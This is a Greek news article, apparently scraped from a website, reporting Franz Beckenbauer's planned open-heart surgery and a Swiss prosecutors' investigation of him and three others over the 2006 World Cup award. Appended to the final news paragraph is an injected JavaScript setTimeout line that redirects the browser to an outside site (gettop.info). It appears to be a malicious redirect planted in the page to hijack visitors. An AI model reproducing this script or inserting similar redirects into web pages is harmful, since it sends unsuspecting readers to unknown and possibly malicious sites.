Σε επέμβαση ανοικτής καρδιάς υποβλήθηκε ο «Κάιζερ»

0
7

 

Σε εγχείρηση ανοικτής καρδιάς υπεβλήθη ο θρύλος του γερμανικού ποδοσφαίρου, Φραντς Μπεκενμπάουερ, σύμφωνα με ανακοίνωση από την οικογένεια του, που σημείωσε ότι επρόκειτο για προγραμματισμένη επέμβαση ενώ αποκλείει οποιαδήποτε σχέση με την έρευνα των ομοσπονδιακών εισαγγελέων της Ελβετίας για τον Μπεκενμπάουερ.

Ο «Κάιζερ» κατηγορείται για απάτη και ξέπλυμα χρήματος για την ανάθεση της τελικής φάσης του Παγκοσμίου Κυπέλλου του 2006 στη Γερμανία.

Ο 70χρονος Γερμανός είναι καλά στην υγεία του και δηλώνει έτοιμος να παλέψει για την αθωότητά του αν και σχολιάζεται η σύμπτωση να συμπέσει η επέμβαση με την ανακοίνωση της έρευνας.

Παράλληλα με τον Μπεκενμπάουερ, στο «στόχαστρο» της έρευνας βρίσκονται επίσης οι Χορστ Ρούντολφ Σμιτ, Τέο Τσβάντσιγκερ και Βόλφγκανγκ Νίρσμπαχ. Το γραφείο του γενικού εισαγγελέα της Ελβετίας γνωστοποίησε ότι συνεργάζεται με τις αρμόδιες αρχές σε Γερμανία και Αυστρία και πως πραγματοποιήθηκαν ταυτόχρονοι έλεγχοι για αποδείξεις σε οκτώ τοποθεσίες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here